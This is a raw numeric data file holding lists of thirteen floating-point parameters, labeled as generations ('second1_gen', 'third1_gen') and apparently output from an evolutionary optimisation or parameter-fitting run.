second1_gen= [[6.473615077297489e-06, -1.2416886913890308e-12, -1.7473505716030156e-13, 3.966285637236728e-11, -7.243488055496258e-11, -1.1645955168783485e-15, 3.1918479761370934e-16, 2.7255618460061466e-05, -1.912188850787629e-06, -1.6430064111592607e-08, 8.970550453733459e-10, 35685411688.23251, 231044368946.34586], [6.393923513974502e-06, -1.2418411778899226e-12, -1.7798884315456173e-13, 3.983180616117193e-11, -7.243742739542879e-11, -1.128236668058653e-15, 3.855466000081844e-16, 2.7200371659468664e-05, -1.9285560276423494e-06, -1.636514926725132e-08, 9.071692193685023e-10, 57865021002.9106, 360571654391.1672], [7.230454358781939e-06, -1.423600316370741e-12, -1.7526876652912844e-13, 5.484412599476033e-11, -7.222102668803471e-11, -1.1795054510279537e-15, 3.642469974043324e-16, 2.4721354631465055e-05, -1.7738362153245365e-06, -1.6042437181983083e-08, 8.601004856702239e-10, 60788722272.11295, 440230270157.01904], [6.435449388867622e-06, -1.2416886913890308e-12, -1.807074860305897e-13, 5.4624696474782334e-11, -7.299561923303083e-11, -1.1155657493946243e-15, 3.855466000081844e-16, 2.4639345261867096e-05, -1.92912357850029e-06, -1.4800406168095671e-08, 9.011563904603084e-10, 90541420172.20418, 503189560104.03455], [6.417695307686038e-06, -1.2339817339229541e-12, -1.7924803979756243e-13, 5.5902899343682586e-11, -7.217875877484109e-11, -1.120826019773443e-15, 3.8364837768074985e-16, 2.2074405673546407e-05, -1.904212437644655e-06, -1.509791791618086e-08, 8.960324081400173e-10, 91138056935.866, 156256693553.4698], [7.235432436183002e-06, -1.444519147741974e-12, -1.7273464723057338e-13, 5.517809418856912e-11, -2.5310572250093563e-10, -1.1658376910672744e-15, 3.3048095015500005e-16, 2.4812886502853343e-05, -1.964119169077712e-06, -1.4777953862585708e-08, 8.945619840357268e-10, 98015149423.40909, 125389712442.99564], [6.382295596647026e-06, -1.5683042319109065e-12, -1.271182130914441e-13, 3.9709881372590666e-11, -2.3411267641257417e-10, -1.1298867172210502e-15, 3.273827033054119e-16, 2.71828464025051e-05, -1.86879521538149e-06, -1.6615697675064263e-08, 8.938783145101195e-10, 108132988244.55444, 600937075323.7117], [7.3000149385339486e-06, -1.4649443926376347e-12, -1.740251215699652e-13, 5.5040821609381877e-11, -2.5448794058714256e-10, -1.1729621402736547e-15, 3.321162280251396e-16, 2.492985953688089e-05, -1.95260325957056e-06, -1.4879723555310096e-08, 8.886352647229086e-10, 118040637271.1665, 119637343045.177], [5.595995170722691e-06, -1.5775800984465949e-12, -1.2531378473105398e-13, 5.5737478708430025e-11, -2.359264703422783e-10, -2.141274549861917e-15, 3.2670998922499434e-16, 2.2375793269713536e-05, -1.8912926681237391e-06, -1.5244852134327217e-08, 9.114608510796109e-10, 193706809398.06177, 145429438824.56485], [6.417695307686038e-06, -1.2390179448049186e-12, -2.0184675219747084e-13, 3.996761820973954e-11, -7.30077645678233e-11, -1.0733818300903034e-15, 3.6521589033170274e-16, 2.7380751148035565e-05, -1.901967051200766e-06, -1.6531476837456585e-08, 8.659462633971021e-10, 291714681643.4888, 219358626907.00577], [7.269087955666727e-06, -1.4398732474157131e-12, -1.745771866624504e-13, 5.5370858680922966e-11, -2.5212090845365535e-10, -1.1547640084684547e-15, 3.1826570991307717e-16, 2.4799848604697875e-05, -1.9802449310363633e-06, -1.4932011828861567e-08, 8.916225586049855e-10, 291814703950.912, 265497905413.09335], [5.9575073045674184e-06, -1.4591405170404072e-12, -1.7515686156504634e-13, 5.071091939607585e-11, -7.251972289899038e-11, -1.172163868062928e-15, 3.2003450301868095e-16, 2.236559796692659e-05, -1.964000257622103e-06, -1.461000086726312e-08, 8.924031273079037e-10, 441351014961.37744, 513124822279.29816], [7.118156558728498e-06, -1.4213484509322684e-12, -1.7594919642528414e-13, 5.502275447498347e-11, -2.359264703422783e-10, -2.146866081339977e-15, 3.3020925008057705e-16, 2.48800717576552e-05, -1.8740196054647742e-06, -1.4681760148497176e-08, 9.194043116452982e-10, 480601682287.2741, 2166349399584.3464], [6.435379358296727e-06, -1.449279705541305e-12, -1.791907685050265e-13, 4.013727926643595e-11, -2.561628978573389e-10, -1.1658376910672744e-15, 3.1916771926698506e-16, 2.706170262409588e-05, -1.9747493962051268e-06, -1.6529378614728517e-08, 8.945619840357268e-10, 480690251628.6576, 455217335045.56067], [7.273965294010602e-06, -1.4508582334938624e-12, -1.2640181562203036e-13, 5.1256890020829106e-11, -2.347526011960417e-10, -1.1573810914157072e-15, 3.313802025100971e-16, 2.5248996663846427e-05, -1.8890715225154116e-06, -1.4830513494585048e-08, 9.024560997678787e-10, 513022508534.7746, 1741282758378.8208], [7.171513003462397e-06, -1.4334443716578728e-12, -1.258745292341622e-13, 5.562080442549079e-11, -2.5310572250093563e-10, -2.177369178159867e-15, 3.269368594462498e-16, 2.5052523082312023e-05, -1.9593459141604013e-06, -1.4665768665138152e-08, 8.920318373308913e-10, 559251400205.1976, 313686240874.89294]]
third1_gen= [[6.428534934734018e-06, -1.2348251959432863e-12, -1.767418187059626e-13, 3.954772029523348e-11, -7.292041892016764e-11, -1.1216042005993232e-15, 3.8462974452187554e-16, 2.732021800880368e-05, -1.912188850787629e-06, -1.6465861899672315e-08, 8.953663972360121e-10, 35914970214.05617, 208658422545.5101], [6.449609175276781e-06, -1.2355212093166627e-12, -1.7892996139776768e-13, 3.978108705811362e-11, -7.260470610345522e-11, -1.128236668058653e-15, 3.8262320992212617e-16, 2.699492740612888e-05, -1.9285560276423494e-06, -1.6459368248390354e-08, 9.071692193685023e-10, 37667755025.66565, 260591174431.75333], [6.393923513974502e-06, -1.2329510175057565e-12, -1.7878217157136278e-13, 4.009121098742944e-11, -7.243742739542879e-11, -1.119215448440791e-15, 3.855466000081844e-16, 2.7170577516281446e-05, -1.946180426984478e-06, -1.6356719885598995e-08, 9.071692193685023e-10, 41822657912.61174, 187148082730.9518], [6.393923513974502e-06, -1.2418411778899226e-12, -1.7764720872488035e-13, 5.5839617178535e-11, -7.217875877484109e-11, -1.1285205693786809e-15, 3.8241419562917457e-16, 2.727322263242888e-05, -1.9285560276423494e-06, -1.6299569164241514e-08, 8.954758973117168e-10, 45658359101.85514, 143455126000.2526], [6.412748625088242e-06, -1.2418411778899226e-12, -1.7788474362949836e-13, 3.98996561577576e-11, -7.290920324596793e-11, -1.1258830930124426e-15, 3.8322709394594156e-16, 2.6978084672522227e-05, -1.9285560276423494e-06, -1.6212095851483947e-08, 9.06465374180439e-10, 61888825971.955795, 378668457219.4866], [7.2950079161541e-06, -1.423600316370741e-12, -1.8067111524974517e-13, 5.467528933636526e-11, -7.269174548770519e-11, -1.1131382577055909e-15, 3.642469974043324e-16, 2.442302310111588e-05, -1.9365154780516644e-06, -1.4736235919210341e-08, 9.02573445716291e-10, 72168008768.07632, 429565720321.34186], [7.277641363649251e-06, -1.4186237292635021e-12, -1.7672076654522444e-13, 5.4875348972838477e-11, -7.250728822785179e-11, -1.1805107762756462e-15, 3.880180132520679e-16, 2.7230117388865188e-05, -1.79140018540739e-06, -1.6042437181983083e-08, 8.524740779894739e-10, 144497176198.74966, 733034177617.006], [6.435449388867622e-06, -1.2375432988348708e-12, -1.8114977137612309e-13, 3.9353291584632385e-11, -7.306938943468394e-11, -1.1645955168783485e-15, 3.887993677152085e-16, 2.4432920122355823e-05, -1.927081007099796e-06, -1.644170413651962e-08, 9.09149545755435e-10, 151124978488.96066, 169172823395.74277], [7.278147471012389e-06, -1.4279386093057266e-12, -1.7683419692117291e-13, 5.493758019518918e-11, -7.289146026177328e-11, -1.1733747472097884e-15, 3.675691109659462e-16, 2.4721354631465055e-05, -1.7638896999117907e-06, -1.588988736168235e-08, 8.632841256471107e-10, 202474467398.45615, 922092113586.5779], [7.177079530800026e-06, -1.234976832476029e-12, -1.7526876652912844e-13, 5.534254133122458e-11, -7.205830797649949e-11, -1.120826019773443e-15, 3.8364837768074985e-16, 2.2258192147086412e-05, -1.7878127478583311e-06, -1.620023857736605e-08, 8.601004856702239e-10, 213869103072.6637, 175609972725.89545], [6.350923506939188e-06, -1.2525603780194753e-12, -1.7993410193080307e-13, 5.465765498048408e-11, -7.243742739542879e-11, -1.1188147125437704e-15, 3.855466000081844e-16, 2.47790541156232e-05, -1.9163436765125797e-06, -1.4800406168095671e-08, 9.043461740243768e-10, 224990894591.97565, 940216435276.2135], [6.375685299492019e-06, -1.2470011129066444e-12, -1.7556981763399573e-13, 5.482994274294271e-11, -7.247391358991481e-11, -1.1737410455893592e-15, 3.8256427214483946e-16, 2.4747394888572957e-05, -1.921085601798487e-06, -1.655011267092608e-08, 9.011563904603084e-10, 242139334921.33466, 239644754200.97003], [6.474178960026375e-06, -1.436844524248817e-12, -1.766513283684079e-13, 3.940038642964773e-11, -7.181977887130175e-11, -1.1548751736666541e-15, 3.1745148598988346e-16, 2.707077658308786e-05, -1.92536072773705e-06, -1.6138736645669917e-08, 8.669699125562364e-10, 435950975348.6226, 363915964843.3034], [6.393923513974502e-06, -1.4269415936091027e-12, -1.7684911527276688e-13, 5.480211712359269e-11, -7.243742739542879e-11, -1.1795054510279537e-15, 3.8683254669914693e-16, 2.7200371659468664e-05, -1.925930700762681e-06, -1.643396668485197e-08, 8.601004856702239e-10, 840789439847.5613, 886246867017.2574], [6.5292806963971566e-06, -1.2521788644307235e-12, -1.752024719240228e-13, 5.432423395298522e-11, -7.243160061946103e-11, -1.1728842336075722e-15, 3.642469974043324e-16, 2.4721354631465055e-05, -1.9201275577069358e-06, -1.6042437181983083e-08, 8.613978338195112e-10, 1220087240914.9465, 1538404370735.8923], [7.222746286095911e-06, -1.4287928653696903e-12, -1.7798884315456173e-13, 5.47608522234827e-11, -7.177949793819456e-11, -1.1234835849356116e-15, 3.638627899273496e-16, 2.4725904181789833e-05, -1.7849753358990938e-06, -1.6004659818379623e-08, 9.095587982641099e-10, 1457214324700.6113, 3971854766728.4727]]
[1.5780628845471506e-10, -1.411490597458207e-12, -2.483949940281473e-13, 5.026488748046414e-11, -1.6612576871621329e-10, -1.6989844545344268e-15, 8.109443782655016e-16, 2.404048022255995e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.489903548622118e-10, 102704594939.3429, 145011267381.10236]
[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, 148817892429.6303]
[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.7924226413310876e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.68878771600575e-08, 9.514461873186105e-10, 117267023779.58536, 138194745977.8172]
[6.483959591091273e-10, -1.5516831882387681e-12, -2.490649104258458e-13, 5.026488748046414e-11, -1.669670220497726e-10, -1.6989844545344268e-15, 8.109443782655016e-16, 2.3963751617497686e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.514461873186105e-10, 81279986793.6045, 148499957167.59894]
[6.525636151737385e-10, -1.3197261044307544e-12, -2.4458923117817936e-13, 4.6265959327559024e-11, -1.6585443429963996e-10, -1.802849923078712e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.68878771600575e-08, 9.514461873186105e-10, 121168243931.69568, 138376625633.08905]
[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.59768924730343e-11, -1.6588127033784183e-10, -1.7924226413310876e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.503282761551985e-10, 127284942067.54468, 147143586736.12967]
[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15, 8.4683341745183045e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, 148817892429.6303]
[6.483959591091273e-10, -1.5516831882387681e-12, -2.477506624442777e-13, 5.026488748046414e-11, -1.669670220497726e-10, -1.7924226413310876e-15, 8.070333012129768e-16, 2.4138485475672502e-05, -1.9859378185800262e-06, -1.6108027319186075e-08, 9.514461873186105e-10, 78167992157.7952, 149819556305.94864]
[2.8389500911155237e-10, -1.3179669217824132e-12, -2.1290409882195637e-13, 5.0376537605765665e-11, -1.7763084077799175e-10, -1.8081388431942655e-15, 8.940150894056582e-16, 2.501288034169883e-05, -2.04721003e-06, -1.5842532923181598e-08, 9.632771875757591e-10, 108694336300.90585, 154375559012.27695]
[3.603083193105678e-11, -1.3197261044307544e-12, -2.213785963757499e-13, 4.581086934703742e-11, -1.6681614728164575e-10, -1.803564324024427e-15, 8.4683341745183045e-16, 2.4065016435368993e-05, -2.0711260096490455e-06, -1.7031696163247858e-08, 1.0052651438176042e-09, 98921398930.67514, 195080915978.15582]
[-2.0926038768787875e-10, -1.4706748741606338e-12, -2.3988654320236774e-13, 4.877026722101481e-11, -1.4519789238682426e-10, -1.8284483886533772e-15, 8.688144408462996e-16, 2.7398930354457147e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.90965422552221e-10, 100727388654.51337, 143318140783.98648]
[-2.0926038768787875e-10, -1.4706748741606338e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.450370910345386e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.935114691513575e-10, 112772825510.86789, 160453198244.84198]
[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, 4.764041880667976e-11, -1.8918518378579712e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7122228639393258e-05, -1.8099079507631247e-06, -1.8203397437532012e-08, 8.935114691513575e-10, 177535436392.6114, 109895891048.79645]
[-2.0926038768787875e-10, -1.6406892521440393e-12, -1.9531413192683389e-13, 4.85603371945204e-11, -1.450370910345386e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 8.935114691513575e-10, 150364957402.63327, 122880053749.32047]
[-8.223802918909379e-10, -1.4625176901480844e-12, -2.703868659848318e-13, 4.852404641399239e-11, -1.896863627503491e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.697391208672331e-05, -1.7223534426462784e-06, -1.7212440323693525e-08, 8.377481199786938e-10, 199237170018.58218, 130994741061.18477]
[-2.1118416643089627e-10, -1.459747004615292e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4471230416768517e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7267797101210102e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.935114691513575e-10, 120611068648.22205, 148716985588.15564]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 190052435274.9098, 101545825010.15762]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4446129047664535e-10, -1.8210829282495652e-15, 8.731899868495941e-16, 2.4857867004975476e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 195239394048.3779, 101879284463.33914]
[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.88885, 102270797763.39908]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, 106305215455.77405]
[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, 4.7704075824842225e-11, -1.8975666267494283e-10, -1.9099300746589145e-15, 8.757096667187756e-16, 2.7122228639393258e-05, -1.809239966469619e-06, -1.8203397437532012e-08, 8.935114691513575e-10, 166731944707.48343, 109962566902.69849]
[-2.0926038768787875e-10, -1.3235354562894133e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.5027518840822802e-10, -1.9355556139972827e-15, 8.69779310515605e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.113315958572542e-10, 198705325524.15018, 111850971687.16727]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.858844276736905e-11, -1.5027518840822802e-10, -1.9257301298903336e-15, 8.765174154706532e-16, 2.507247127369048e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.134614417430693e-10, 152877011534.3794, 128488226222.4665]
[-8.325113652893972e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8226533446456543e-15, 8.718221314640016e-16, 2.471871023322042e-05, -1.788813296914756e-06, -1.836034443165441e-08, 9.148927620445716e-10, 115664967416.85544, 172987399752.44284]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]
[-8.372802930516975e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.765346456450067e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 191606485390.66824, 100937635343.36494]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, 101220474756.5564]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.4730851235460287e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.24603, 101440046940.62292]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, 101479475091.5385]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 186125019263.05353, 101522685052.87083]
[-8.372413642600907e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.826770959894538e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.675713932751666e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 176424094355.21158, 102059630396.96977]
[-8.32774857282967e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.475667375214216e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7921694947468313e-06, -1.836034443165441e-08, 9.080472327376693e-10, 190619161162.84558, 102134941196.42899]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.835930442286039e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89273, 102270797763.3992]
[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9482957217087468e-13, 4.831070029448083e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.688144408462996e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89435, 102270797763.39929]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4446129047664535e-10, -1.8304219886094965e-15, 8.765174154706532e-16, 2.4857867004975476e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 191644867011.30374, 102518032445.5969]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.82400894161232e-11, -1.4446129047664535e-10, -1.8228595048374295e-15, 8.751158883884222e-16, 2.506841119647095e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 172947032775.99432, 102577021916.3392]
[-2.103367158359051e-10, -1.3359785407261977e-12, -1.9376482536341035e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, 106305215455.77405]
[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8161784527844478e-08, 9.087619653117874e-10, 144963603428.97382, 112061347287.60056]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.5026084747023036e-05, -1.7900208911755532e-06, -1.830053261436748e-08, 9.087619653117874e-10, 125853468889.92097, 136457449593.06062]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.776082515662521e-06, -1.836034443165441e-08, 9.087619653117874e-10, 126137991779.33096, 160562679389.67618]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, 100125948657.42978]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 183895104728.34744, 101215117638.35565]
[-2.0926038768787875e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, 101220474756.5564]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11664, 101220474756.55742]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.476291648179518e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.4617, 101440046940.6675]
[-2.0969974314689316e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, 101479475091.5385]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.8730627003901226e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.58997, 101479475091.5439]
[-2.0926038768787875e-10, -1.6370065196284276e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.5149586855224063e-05, -1.8040587516026417e-06, -1.830053261436748e-08, 9.081976758127089e-10, 174674218067.03134, 101707557509.25955]
[-2.0780704759852712e-10, -1.3359785407261977e-12, -1.928247479392491e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.815489945689696e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.830053261436748e-08, 9.081976758127089e-10, 177564736843.2668, 101910116331.42278]
[-2.0926038768787875e-10, -1.3481496678499343e-12, -1.9612804716494087e-13, 4.869384519400452e-11, -1.4625361988654996e-10, -1.816149350524488e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.087619653117874e-10, 176677319245.07892, 101942928295.47075]
[-8.324503936172223e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4535167828811644e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.063398319687734e-10, 161710635101.41095, 104790698646.6004]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8168585276282465e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.102513898455556e-10, 160649925757.17908, 106424978687.80653]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.765174154706532e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.067222192179334e-10, 157509126624.7564, 106648081137.30634]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.87567764690249e-11, -1.473869541008466e-10, -1.8210829282495652e-15, 8.797810044472039e-16, 2.5128697145423343e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.089655956213592e-10, 156027014786.34595, 106784848298.00577]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.758120054489215e-16, 2.489589641570383e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.120599461707459e-10, 159857940983.01962, 106918161793.97298]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9347415380665696e-13, 4.85631967683728e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836417410231251e-08, 9.134390375783151e-10, 142628527511.76648, 117274357359.96004]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9567576322418712e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.120365536291957e-10, 136801158565.52109, 118996909122.33968]
[-2.0926038768787875e-10, -1.3468298773490566e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.4730851235460287e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.13148553316506e-10, 131221998343.07083, 125656067768.88814]
[-8.372802930516975e-10, -1.6610460978653825e-12, -1.9391155389121011e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.765346456450067e-16, 2.500200335107093e-05, -1.777109321965829e-06, -1.836034443165441e-08, 9.081976758127089e-10, 107442969837.9951, 191438895729.71088]
[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4659424506650604e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 185690352687.11697, 99223644222.007]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, 100125948657.42978]
